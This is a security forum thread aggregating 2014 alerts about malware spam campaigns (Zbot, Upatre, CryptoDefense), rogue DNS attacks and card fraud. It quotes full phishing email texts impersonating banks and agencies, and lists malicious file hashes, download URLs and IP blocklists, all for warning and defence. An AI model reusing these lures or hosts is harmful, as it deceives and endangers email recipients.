In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the NatWest Bank Secure Email Help Desk...

27 March 2014 : Version 1 (NatWest bank) SecureMessage.zip (8kb Extracts to SecureMessage.exe (19kb)
Current Virus total detections: 5/51* MALWR Auto Analysis **
27 March 2014 : Version 2 (HSBC) SecureMessage.zip (11kb) Extracts to SecureMessage.exe (24kb)
Current Virus total detections: 0/51*** MALWR Auto Analysis ****
This You have received a secure message is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/e7117359aca8db292b813092a2f4f6cf1a14a2967c8bcc5a5523cbe3ec0312a4/analysis/

** https://malwr.com/analysis/ZmFkZDRhNTE4NTZmNGFkZmE5NTkwZGQ5YzlhODQ1Zjg/

*** https://www.virustotal.com/en/file/ec97a63d19552d1af8e67be87dca7703172a9041e43aaeb00cbb0bfe7dfc3cbb/analysis/

**** https://malwr.com/analysis/NGI0NjVmYzYwMDU5NDBhYmJlNWMxNGRjMDVmYmMyZTQ/
___

Facebook You send new photo – fake PDF malware
- http://myonlinesecurity.co.uk/facebook-send-new-photo-fake-pdf-malware/
Mar 27, 2014 - "... pretending to be from Facebook is another one from the current Androm bot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. This campaign follows on from other similar attempts to infiltrate your computer using Facebook as a theme...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/03/Facebook-You-send-new-photo.png

27 March 2014 DCIM_IMAGEForYou.rar (40kb) Extracts to DCIM_IMAGEForYou.scr
Current Virus total detections: 1/51* MALWR Auto Analysis**
This You send new photo is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7ae601f4e0e16024b613d5449023c77b12e7041f5fce78ef95d26d8636bc9404/analysis/

** https://malwr.com/analysis/ZWQyMjdkY2MwZDcwNGVlNWE1YzAxYjhjZWVlNTVjMmM/

:mad: :mad:

AplusWebMaster
2014-03-28, 13:52
FYI...

Fake Bank acct. security warning – fake PDF malware
- http://myonlinesecurity.co.uk/banking-account-security-warning-fake-pdf-malware/
28 Mar 2014 - "Banking account security warning pretending to come from FRAUD ALERT SYSTEM <k.cooper@ fraudalert .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Many of these bank themed emails are extremely difficult to distinguish from phishing scams. It is becoming very frequent that the same or almost identical emails are being used over and over. Sometimes they have a link to a -fake- website where they expect you to give them your details. Other times it contains a html file that they want you to -click- on and enter details. This time they have a -fake- pdf file that if you are unwise enough to open it would infect your computer and enroll it into the Zeus botnet...
Subjects seen:
Important: Unauthorized attempt to access your banking account
Banking account security warning
Attention! Your credit card is being used
Emails seen:
Dear Sir or Madam,
The banking security system has just registered an external attempt to use your credit card from an unknown location.
In view of the fact that the safety of the credit card account is in danger we strongly recommend you to use the emergency instructions given in the attachments.
To protect users from attacks and fraudulent activities coming from within the banking system itself we need your permission to start the investigation and adjust the security measurements. If the required steps won’t be completed the account will be temporarily suspended and will be available after visiting a local office.
Step-by-step instructions and emergency phone number are in attachments to the email.
Truly yours,
PCI DSS Chief officer
K. Cooper ...

28 March 2014 : Fraud alert document 778-1.zip (345kb) Extracts to Fraud alert document 778-1.exe
Current Virus total detections: 4/51* MALWR Auto Analysis**
This Banking account security warning is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
* https://www.virustotal.com/en/file/5bbafa530193c35a41fa41df1c507bdaf81e5ee02be4343f19dc42c7c7393c50/analysis/

** https://malwr.com/analysis/NjE0ZmFmMmNlNTgyNDYxODg3MjUzYjU5NjcyNTkyZTc/
___

Something evil on 192.95.44.0/27 (OVH Canada)
- http://blog.dynamoo.com/2014/03/something-evil-on-1929544027-ovh-canada.html
28 Mar 2014 - "192.95.44.0/27 (spotted by Frank Denis*) is another evil OVH Canada netblock which I assume belongs to their black hat customer r5x .org / Penziatki although now OVH seem to be masking the customer details. I can see the following active subdomains within this range, all of which can be assumed to be malicious...
(Long list of URLs at the dynamoo URL above.)
I recommend that you apply the following blocklist:
192.95.44.0/27
accruespecialiste .ru
reachprotectione .ru
reachmape .ru
acquireconnectionse .ru "
* https://twitter.com/jedisct1/status/449309681408684032
___

Sky .com SPAM leads to Gameover Zeus
- http://blog.dynamoo.com/2014/03/skycom-statement-of-account-spam-leads.html
28 Mar 2014 - "This -fake- Sky spam has a malicious attachment:
Date: Fri, 28 Mar 2014 07:16:43 -0300 [06:16:43 EDT]
From: "Sky.com" [statement@ sky .com]
Subject: Statement of account
Afternoon,
Please find attached the statement of account.
We look forward to receiving payment for the February invoice as this is now due for
payment.
Regards,
Darrel ...

The attachment is a ZIP file which contains an exectable Statement_03282014.exe (note that the date is encoded into the file). This has a VirusTotal detection rate of 8/51*. The Malwr analysis** shows several attempted network connections. Firstly there's a download of a configration file from [donotclick]igsoa .net/Book/2803UKd.wer and then subsequently an attempted connection aulbbiwslxpvvphxnjij .biz on 50.116.4.71 (a Linode IP which has been seen before) and a number of -other- autogenerated domains.
Recommended blocklist:
50.116.4.71
aulbbiwslxpvvphxnjij .biz
lpuoztsdsnvyxdyvwpnlzwg .com..."
(More domains listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/bc72dc6cd6adb3c145df9971104ce747f08d53cd00b0993dd22b84b64bf9312f/analysis/1396011158/

** https://malwr.com/analysis/N2ZkYWFiNWU1YWUwNGRlNGFmOGRmNTk1MGI3MTYwNDU/
___

New Man-in-the-Middle attacks leveraging rogue DNS
- http://atlas.arbor.net/briefs/index#-1333965473
27 Mar 2014
Elevated Severity
New Man-in-the-Middle attacks are manipulating DNS settings and posing as websites of over 70 different financial institutions in order to capture login credentials.
Source:
- http://blog.phishlabs.com/new-man-in-the-middle-attacks-leveraging-rogue-dns
Mar 26, '14 - "... new wave of "Man-in-the-Middle" (MitM) attacks targeting users of online banking and social media. Customers of more than 70 different financial institutions are being targeted. In these attacks, hackers use -spam- to deliver malware that changes DNS settings and installs a rogue Certificate Authority (CA). The DNS changes point to the hacker's clandestine DNS name server so that users are directed to proxy servers instead of legitimate sites... The browser displays the proper website name and displays the familiar security icon to indicate a trusted, secure connection. The hacker's proxy sits between the authorized user and the real website, capturing login credentials and injecting code into the browsing session. This allows the hacker to take total control of the user's account and carry out unauthorized banking transactions as well as other actions...
> http://blog.phishlabs.com/hs-fs/hub/326665/file-613453020-png/Images/New_MitM_Attack.png
The hacker initiates these attacks by using spam to deliver malware to victims via malicious attachments... these spam emails contain a message designed to entice the user to open an attached RTF (Rich Text Format) document. The document contains an OLE (Object Linking and Embedding) object which is actually an executable program file. This program is the malware which changes the DNS and Certificate Authority settings that allow the attack to be performed without any outward signs visible to the user.
> http://blog.phishlabs.com/hs-fs/hub/326665/file-604096624-png/Images/EXE_disguised_as_RTF.png
On many systems, double-clicking an embedded program will execute it. Cybercriminals may use tools to create specially crafted RTF document files that display a familiar data file icon and a caption in most popular word processing programs; thus hiding or obscuring clues to the executable nature of the object, such as the EXE filename extension... The malware embedded in the spammed documents is a backdoor RAT (Remote Administration Tool) with an initial payload containing instructions to change DNS and security settings when initialized. The file is a Win32 PE (Portable Executable) EXE file and is actually a compiled form of an AutoIt script. The AutoIt scripting tools used offer the option to obfuscate the compiled code, and the version used to produce this malware makes it more difficult to decompile or reverse engineer the resulting EXE file than earlier versions. Some but not all of the samples found have been run through a second "cryptor" to aid in evading detection by anti-malware tools... One of the first actions performed by the malware is changing the DNS settings on the infected user’s PC. The malware configures the PC to use the hacker's rogue DNS server... PhishLabs continues to monitor these attacks and is working with others to mitigate the threat."
___

CVE-2014-0322* integrating Exploit Kits
- http://atlas.arbor.net/briefs/index#1584606323
27 Mar 2014
Elevated Severity
The disclosed CVE-2014-0322 vulnerability affecting Internet Explorer 9 and 10 is now being integrated into exploit kits.
This follows previously observed patterns of 0-day exploit code first being developed and used by APT actors for specific targets, then later adapted by cyber criminals for use in exploit kits targeting a much wider range of users who have not yet applied security updates.
Source: http://malware.dontneedcoffee.com/2014/03/cve-2014-0322-integrating-exploit-kits.html

* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322 - 9.3 (HIGH)
Last revised: 03/16/2014

:fear: :mad:

AplusWebMaster
2014-03-31, 15:23
FYI...

Android.MisoSMS - malware ...
- http://www.fireeye.com/blog/technical/malware-research/2014/03/android-misosms-its-back-now-with-xtea.html
Mar 31, 2014 - "FireEye labs recently found a more advanced variant of Android.MisoSMS, the SMS-stealing malware that we uncovered last December* — yet another sign of cybercriminals’ growing interest in hijacking mobile devices for surveillance and data theft. Like the original version of the malware, the new variant sends copies of users’ text messages to servers in China. But the newest rendition adds a few features that make it harder to detect, including a new disguise, encrypted transmissions, and command-and-control (CnC) communications that are handled natively rather than over email... The newest version of MisoSMS suggests that cyber attackers are increasingly eyeing mobile devices — and the valuable information they store — as targets. It also serves as a vivid reminder of how crucial protecting this threat vector is in today’s mobile environment."
* http://www.fireeye.com/blog/?p=4126
(More detail available at both fireeye URLs above.)
___

Who’s Behind the ‘BLS Weblearn’ Credit Card SCAM
- http://krebsonsecurity.com/2014/03/whos-behind-the-bls-weblearn-credit-card-scam/
Mar 31, 2014 - "A new rash of credit and debit card scams involving bogus sub-$15 charges and attributed to a company called “BLS Weblearn” is part of a prolific international scheme designed to fleece unwary consumers... At issue are a rash of phony charges levied against countless consumers for odd amounts — such as $10.37, or $12.96. When they appear on your statement, the charges generally reference a company in St. Julians, Malta such as BLS*Weblearn or PLI*Weblearn, and include a 1-888 number that may or may not work (the most common being 888-461-2032 and 888-210-6574)...
onlinelearningaccess .com, one of the fraudulent affiliate marketing schemes that powers these -bogus- micropayments:
> http://krebsonsecurity.com/wp-content/uploads/2014/03/onlinelearningaccess.png
... it appears that the payments are being processed by a company called BlueSnap, which variously lists its offices in Massachusetts, California, Israel, Malta and London. Oddly enough, the payment network behind the $9.84 scams that surfaced last year — Credorax — also lists offices in Massachusetts, Israel, London and Malta. And, just like with the $9.84 scam*, this latest micropayment fraud scheme involves an extremely flimsy-looking affiliate income model that seems merely designed for abuse. According to information from several banks contacted for this story, early versions of this scam (in which fraudulent transactions were listed on statements as PLI*WEBLEARN) leveraged pliblue .com, formerly associated with a company called Plimus, a processor that also lists offices in California and Israel (in addition to Ukraine)... If you see charges like these or any other activity on your credit or debit card that you did not authorize, contact your bank and report the fraud immediately. I think it’s also a good idea in cases like this to request a new card in the odd chance your bank doesn’t offer it: After all, it’s a good bet that your card is in the hands of crooks, and is likely to be abused like this again. For more on this scam, check out these posts from DailyKos** and Consumerist***."
* http://krebsonsecurity.com/2014/01/deconstructing-the-9-84-credit-card-hustle/

** http://www.dailykos.com/story/2014/03/15/1284964/-Credit-card-fraud-warning

*** http://consumerist.com/2014/03/19/check-your-debit-credit-card-statements-for-bls-weblearn-scam-transactions/
___

Fake cclonline "Order Despatched" – fake doc malware
- http://myonlinesecurity.co.uk/cclonline-com-order-despatched-fake-doc-malware/
Mar 31, 2014 - "... pretending come from sales@ cclonline .com and to be a notification about a computer being despatched to you via DPD courier services is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Dear ellie,
We are pleased to confirm that your order reference 1960096 has been despatched via Economy Courier. You will find the full details of your order and this delivery in the attached document. In a few hours, your consignment 0255417316 can be tracked through the DPD website by clicking the following link: www .dpd .co .uk/tracking/trackingSearch.do?search.searchType=1&search.consignmentNumber=0255417321
You may receive further information concerning your consignment direct from DPD via email and/or SMS
Should you have any queries regarding your purchase, our customer service staff will be pleased to assist. E-mail mailto:custservice@ cclonline .com or telephone 01274 471206.
Thank you for choosing CCL Computers.
Yours sincerely...

31March 2014: DESPATCH_NOTE_B18E7F.zip (72kb) Extracts to disp_75464354787914325.doc.exe
Current Virus total detections: 2/51* . This cclonline .com – Order Despatched is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper doc file with a fake Bluetooth icon instead of the .exe file it really is..."
* https://www.virustotal.com/en/file/cbc255ecf6883a056e1ab3693ba2138df629f85bb8ebb19516706639d127892c/analysis/
___

ADP Benefit Election Spam
- http://threattrack.tumblr.com/post/81291999525/adp-benefit-election-spam
Mar 31, 2014 - "Subjects Seen:
Benefit Elections
Typical e-mail details:
Please review the attached CBE form, If you require changes to the options shown, please contact me right away so that we may address your concerns. We will record your elections in our system and provide you a final Client Confirmation Statement for your review.
Please sign and send it back.
Regards,
ADP TotalSource Benefits Team

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f55062c1e3da33207f1cdda206146ae1/tumblr_inline_n3b283sybc1r6pupn.png

Malicious File Name and MD5:
CBE_Form.zip (60770AD82549984031FD3615E180EC83)
CBE_Form.scr (20406804C43D11DA25ABC2714697EC59)

Tagged: ADP, Upatre
___

Google’s Public DNS intercepted in Turkey
- http://googleonlinesecurity.blogspot.com/2014/03/googles-public-dns-intercepted-in-turkey.html
Mar 29, 2014 - "We have received several credible reports and confirmed with our own research that Google’s Domain Name System (DNS) service has been intercepted by most Turkish ISPs (Internet Service Providers). A DNS server tells your computer the address of a server it’s looking for, in the same way that you might look up a phone number in a phone book. Google operates DNS servers because we believe that you should be able to quickly and securely make your way to whatever host you’re looking for... imagine if someone had changed out your phone book with another one, which looks pretty much the same as before, except that the listings for a few people showed the wrong phone number. That’s essentially what’s happened: Turkish ISPs have set up servers that masquerade as Google’s DNS service."

:mad: :fear:

AplusWebMaster
2014-04-01, 14:10
FYI...

Something evil on 64.202.116.124
- http://blog.dynamoo.com/2014/04/something-evil-on-64202116124.html
1 Apr, 2014 - "64.202.116.124 (HostForWeb, US) is currently hosting exploit kits (see this example*). I recommend that you block traffic to this IP or the domains listed in this pastebin**. Most of the domains listed are dynamic DNS ones. If you block all such domains in that list it is nice and managable:

in .ua
myftp .org
sytes .net
hopto .org
no-ip .biz
myvnc .com
sytes .net
no-ip .info
tobaccopeople .com "
* http://urlquery.net/report.php?id=1396348899312

** http://pastebin.com/Pq4kDit6

- https://www.virustotal.com/en/ip-address/64.202.116.124/information/
___

Fake message from your attorney - PDF malware
- http://myonlinesecurity.co.uk/message-attorney-fake-pdf-malware/
1 April 2014 - "... pretending to be from your neighbour is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. Almost all of these have a password stealing component, with the aim of stealing your email or FTP ( web space) log in credentials. Many of them are also designed to specifically steal your facebook and other social network log in details. This one also has a rootkit component so the malware it downloads & ruins, attempts to stay hidden on your computer...
Hi, there!
This is your neighbor writing here. Today your attorney popped you, but you were out, so he left a message for you.
I have attached the file in this email, so you can open and check everything you need.
Your attorney told me it is quite urgent and as soon as you check this message you should call him back.
If something is not clear, you can find the cell phone number of your attorney into the file, so you can dial it at once...

1 April 2014 please call me back asap.zip (346kb) Extracts to please call me back asap.exe
Current Virus total detections: 6/51*. This message from your attorney is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a68098d5359236a72937af1649d2a86cd5aaef5be7a125c2c4fa377906c36e81/analysis/
___

Fake rbs .com "RE: Copy" SPAM
- http://blog.dynamoo.com/2014/04/rbscom-re-copy-spam.html
1 Apr 2014 - "This very terse spam has a malicious attachment:
Date: 1 Apr 2014 14:25:39 GMT [10:25:39 EDT]
From: Kathryn Daley [Kathryn.Daley@ rbs .com]
Subject: RE: Copy
(Copy-01042014)

The attachment is Copy-04012014.zip which in turn contains a malicious executable Copy-04012014.scr which has a VirusTotal detection rate of just 3/50*. The Malwr analysis** shows that is has the characteristics of P2P/Gameover Zeus and it makes several network connections starting with a download of a configuration file from: [donotclick]photovolt .ro/script/0104UKd.bis . The malware then tries to contact a number of other domains. I recommend using the following blocklist:
50.116.4.71
photovolt .ro
aulbbiwslxpvvphxnjij .biz ..."
(More listed at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/72a641424b6754a44f1885c4413798d71b8c411290daf6d94ffb803619c55a11/analysis/1396353996/

** https://malwr.com/analysis/MWY4M2M3Y2FjMGM2NGVmZGE5YTUwZTJjMDhlYmM3ZmY/
___

Royal Mail Lost Package Spam
- http://threattrack.tumblr.com/post/81388009110/royal-mail-lost-package-spam
Apr 1, 2014 - "Subjects Seen:
Failure to deliver
Typical e-mail details:
Dear <email address>
Royal Mail has detained your package #98159-5424.Unfortunately some important information is missing to complete the delivery.
Please fulfil the documents attached, and send it back to: onlinepostage@ royalmail.com
The RM International Mail Branch holding will notify you of the reason for detention .

Malicious File Name and MD5:
rm_332009105C.zip (AB0041BC7687AE92E378B145663519C5)
Deliery_info_7383461243.pdf.exe (3F54A5BBAD1B63263135DC97037447E1)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/27ef52933a52bcd283eb53473041685b/tumblr_inline_n3cu66TITU1r6pupn.png
___

Bogus email “ACH failed...” - trojan in .scr format
- http://blog.mxlab.eu/2014/03/31/email-ach-failed-due-to-system-failure-contains-attached-trojan-in-scr-format/
Mar 31, 2014 - "... new trojan distribution campaign by email with the subject “ACH failed due to system failure”... has the following body:
ACH PAYMENT CANCELLED
The ACH Transfer (ID: 87052955198926), recently submitted from your savings account (by you or any other person), was CANCELLED by other financial institution.
Rejection Reason: See details in the acttached report.
Transfer Report: report_87052955198926.pdf (Adobe Reader PDF)
13450 Sunrise Valley Drive, Suite 100
Herndon, VA 20171
2014 NACHA – The Electronic Payments Association

The attached ZIP file has the name report_87052955198926.zip and contains the 19 kB large file report_28740088654298.scr. The trojan is known as W32/Trojan.MNWL-4927 or TROJ_GEN.F0D1H00CV14. At the time of writing, 3 of the 48 AV engines did detect the trojan at Virus Total. Use the Virus Total permalink* and Malwr permalink** for more detailed information.
SHA256: 1ab76103d28fda1ed11d2019e7c47df3d57401aee43e7df785b057853f9c1f52 "
* https://www.virustotal.com/en/file/1ab76103d28fda1ed11d2019e7c47df3d57401aee43e7df785b057853f9c1f52/analysis/

** https://malwr.com/analysis/OTg5MWRiNTM5ODk4NDU0Y2E3ZDc5NGYzYjgzNzUyMGM/

:fear: :mad:

AplusWebMaster
2014-04-02, 16:57
FYI...

Something evil on 66.96.223.204
- http://blog.dynamoo.com/2014/04/something-evil-on-6696223204.html
2 Apr 2014 - "66.96.223.204 (Network Operations Center, US) appears to be hosting some sort of malicious redirectors being used in current malware campaigns. VirusTotal gives a snapshot of the badness*.
* https://www.virustotal.com/en-gb/ip-address/66.96.223.204/information/
Recommended blocklist:
66.96.223.204 ..."
(More URLs listed at the dynamoo URL above.)
___

Something evil on 213.229.69.41
- http://blog.dynamoo.com/2014/04/something-evil-on-2132296941.html
2 Apr 2014 - "This tweet by Malmouse* got me investigating what was happening on 213.229.69.41.. and the answer is that it appears to be unmitigated badness. First of all, these domains are either currently or recently hosted on 213.229.69.41, or are associated with it in some way... VirusTotal gives a good overview of the badness on this IP**.
** https://www.virustotal.com/en-gb/ip-address/213.229.69.41/information/
... All these domains appear to be recently registered with the exception of gfthost .com which has ns1.gfthost .com and ns2.gfthost .com hosted on the same IP. Both those nameservers are used exclusively for these malware domains, so there must be some sort of connection... I recommend that you -block- 213.229.69.41 (Simply Transit, UK) ..."
* https://twitter.com/malm0u53/status/451299152316882944
___

Fake Facebook emails lead to Upatre Malware
- http://blog.malwarebytes.org/security-threat/2014/04/fake-facebook-notification-emails-lead-to-upatre-malware/
Apr 2, 2014 - "... SPAM messages in circulation bearing the message “Some men commented on your status”... Here’s the spam message currently landing in mailboxes, which looks like a Facebook notification:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbcute1.jpg
... The -clickable- link leads to a Dropbox page which is currently offline. The Malware involved in this particular spam run claims to be a PDF file:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbspam2.jpg
The spammers are making use of the Windows feature which hides extensions of common file types...
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/04/fbspam3.jpg
... the so-called PDF is actually an .scr file, commonly used in Malware campaigns... As for the Malware itself, the VirusTotal score is currently pegged at 23/51*, a Malwr analysis can be seen here**... Upatre is well known for email campaigns and downloading additional Malware onto a compromised PC – from there, browser credentials, insecure passwords and anything else the attacker can think of could be up for grabs. Upatre often tends to go hand in hand with ZBot, which has many ties to Ransomware..."
* https://www.virustotal.com/en/file/86e24ce48b0a4732eb11a912cc1f5d2962419042798108fea12ed8c656d59322/analysis/

** https://malwr.com/analysis/M2YyMjYwNjhkM2I1NDMxN2E5ZWQzNWNiYjQzMzljZTI/

- http://myonlinesecurity.co.uk/facebook-men-commented-status-fake-pdf-malware/
1 Apr 2014
___

Fake Companies House "Annual Return" – fake PDF malware
- http://myonlinesecurity.co.uk/companies-house-ar01-annual-return-received-fake-pdf-malware/
2 Apr 2014 - "... 'Annual Return' pretending to be from Companies House <web-filing@ companies-house .gov .uk> received is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer.They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses, with the hope of getting a better response than they do from consumers...
Companies House
Thank you for completing a submission Reference # (0282665).
• (AR01) Annual Return
Your unique submission number is 0282665
Please quote this number in any communications with Companies House.
Check attachment to confirm acceptance or rejection of this filing.
All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission.
Once accepted, these changes will be displayed on the public record...

Fake Companies House(AR01) Annual Return received:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/04/companies-house-annual-return.png
2 April 2014: Ref_0282665.zip (7kb) - Extracts to Ref_04022014.scr
Current Virus total detections: 14/51* . This (AR01) Annual Return received is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en-gb/file/254708a3742e9538609454ee33dfba5fb9eb3e9cd7f52b5889f76e1df76c9dff/analysis/

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d8e1a430bf1091e1bb34d53c4f6394cb/tumblr_inline_n3ew2oX2u81r6pupn.png
___

Fake Bitdefender A/V ...
- http://www.hotforsecurity.com/blog/fans-tricked-with-fake-bitdefender-antivirus-plus-2015-8262.html
Mar 31, 2014 - "... -fake- Bitdefender antivirus download posted on YouTube leads users to fraudulent surveys and premium SMS scams. The video had hundreds of views and several French users posted messages to warn others.
> http://www.hotforsecurity.com/wp-content/uploads/2014/03/fans-tricked-with-fake-bitdefender-antivirus-plus-2015.jpg
... The grammatically-troubled spammers lure users into clicking on a URL-shortened link that hides a fraudulent website. The “Bitdefender” download is then blocked by a phony human verification warning. “It is very simple to verify, just complete any of the verification forms or surveys from the list below,” the message reads. The options include direct downloads, “how smart are you” surveys and selections of soccer games.
> http://www.hotforsecurity.com/wp-content/uploads/2014/03/fans-tricked-with-fake-bitdefender-antivirus-plus-2015-1.jpg
Users never get to download Bitdefender Antivirus Plus 2015, but they are redirected to scams such as premium SMS fraud that copies Facebook’s design to look like a legitimate app of the social network. For a month now, several “entrepreneurs” have also been spreading license keys for Bitdefender Total Security on Facebook. Bitdefender has reported the -fake- YouTube video and the -deceptive- Facebook profile and advises users to be cautious before downloading security software from third parties..."

:fear: :mad:

AplusWebMaster
2014-04-04, 18:35
FYI

Attachment inside an attachment - UPATRE ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/upatre-ups-the-ante-with-attachment-inside-an-attachment/
Apr 4, 2014 - "... the UPATRE threat is constantly advancing its techniques–this time, by using multiple levels of attachments... a spammed message that imitates emails from known banks such as Lloyds Bank and Wells Fargo. The spam within spam technique was already notable in itself, as the .MSG file contained another .MSG file attached–only this time, the attached file actually contains the UPATRE variant, which we detect as TROJ_UPATRE.YYKE...
An email from “Lloyds Bank” contains a .MSG attachment
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/upatre-spam1.png
Opening the .MSG attachment reveals a malicious .ZIP file
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/04/upatre-spam2.png
Based on our analysis, TROJ_UPATRE.YYKE downloads its ZBOT tandem, detected as TSPY_ZBOT.YYKE. This ZBOT variant then downloads a NECURS variant detected as RTKT_NECURS.RBC. The NECURS malware is notable for its final payload of disabling computers’ security features, putting computers at serious risk for further infections. It gained notoriety in 2012 for its kernel-level rootkit and backdoor capabilities. It is important to note that we are now seeing an increase of this malware, which can be attributed to UPATRE/ZBOT being distributed as attachments to spammed messages... Users should always be on their guard when dealing with unknown or unfamiliar emails, sites, or files..."
___

SPAM: Important – New Outlook Settings – fake PDF malware
- http://myonlinesecurity.co.uk/important-new-outlook-settings-fake-pdf-malware/
Apr 4, 2014 - "... pretends to come from your own domain is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment. A very high proportion are being targeted at small and medium size businesses...
Please carefully read the attached instructions before updating settings.
This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk@ thespykiller .co .uk and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it.

4 April 2014: OutlookSettings.zip (7kb) : Extracts to OutlookSettings.scr
Current Virus total detections: 5/51*. This Important – New Outlook Settings is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is..."
* https://www.virustotal.com/en/file/2c90d7bf5386c87821f27069e453acf2dd21c36d246062b0f6a176921d7d7c53/analysis/
____

Twitter Spam: Compromised Accounts and Websites lead to Diet Spam
- http://www.symantec.com/connect/blogs/twitter-spam-compromised-accounts-and-websites-lead-diet-spam
4 Apr 2014 - "Earlier this week, a large number of Twitter accounts were compromised and used by spammers to spread “miracle diet” spam. The compromised accounts included public figures, as well as average users of the social networking service.
Twitter miracle diet spam:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure1_10.png
... Twitter is no stranger to this problem. Over the years, we’ve seen many different campaigns try to capitalize on the latest miracle diet craze. In this particular case, spammers are trying to peddle garcinia cambogia extract through a page designed to look identical to the real Women’s Health website.
Fake promotional page used by spammers in this campaign
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure2_6.png
Many of the tweets contained messages saying “I couldn’t believe it when I lost 6 lbs!” and “I was skeptical, but I really lost weight!” followed by a URL shortened using Bitly .com. Celebrities and public figures are often sought after to help endorse products. One of the compromised accounts... By compromising accounts like Jamie’s, spammers increase their odds of convincing someone to click on their links and perhaps even purchase the diet product... Diet spam is here to stay and social networks remain the perfect place for spammers to try to make money off of unsuspecting users..."
___

Fiesta Exploits Kit Targeting High Alexa-Ranked Site
- https://atlas.arbor.net/briefs/index#-564048760
Elevated Severity
3 Apr 2014
Analysis: Exploits kits are easy to find and purchase, making attacks relatively easy for cybercriminals. Like other kits, Fiesta EK includes a number of exploits targeting widespread applications with disclosed vulnerabilities; it is rare for a kit to have zero-day capabilities... In addition, most vulnerabilities targeted by kits have patches available, including some updates available as far back as 2012. The most likely intended victims of EKs are therefore those with unpatched systems. Applying patches in a timely manner is absolutely critical for network security. Multiple Fiesta EK campaigns, including this current one, have made use of -dynamic- DNS (DDNS) domains to host exploits. Due to the widespread malicious use of DDNS, organizations should automatically scrutinize network traffic to DDNS in order to determine whether or not it is legitimate.
Source: http://community.websense.com/blogs/securitylabs/archive/2014/04/02/fiesta-exploits-kit-targeting-high-alexa-site.aspx
___

CryptoDefense - CryptoLocker imitator ...
- http://www.symantec.com/connect/blogs/cryptodefense-cryptolocker-imitator-makes-over-34000-one-month
Mar 31, 2014 - "... CryptoDefense appeared in late February 2014 and since that time Symantec telemetry shows that we have blocked over 11,000 unique CryptoDefense infections. Using the Bitcoin addresses provided by the malware authors for payment of the ransom and looking at the publicly available Bitcoin blockchain information, we can estimate that this malware earned cybercriminals over $34,000 in one month alone... Symantec has observed CrytoDefense being spammed out using emails such as the one shown:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure1_9.png
... Example of HOW_DECRYPT.HTML file:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure2_5.png
... malware authors are using the Tor network for payment of the ransom demand. If victims are not familiar with what the Tor network is, they even go as far as providing instructions on how to download a Tor-ready browser and enter the unique Tor payment Web page address. The use of the Tor network conceals the website’s location and provides anonymity and resistance to take down efforts. Other similar threats, such as Cryptorbit (Trojan.Nymaim.B), have used this tactic in the past... Once the user opens their unique personal page provided in the ransom demand using the Tor Browser, they will be presented with a CAPTCHA page:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure3_3.png
... Once they have filled in the CAPTCHA correctly, the user will be presented with the ransom payment page:
> http://www.symantec.com/connect/sites/default/files/users/user-2598031/Figure4_4.png
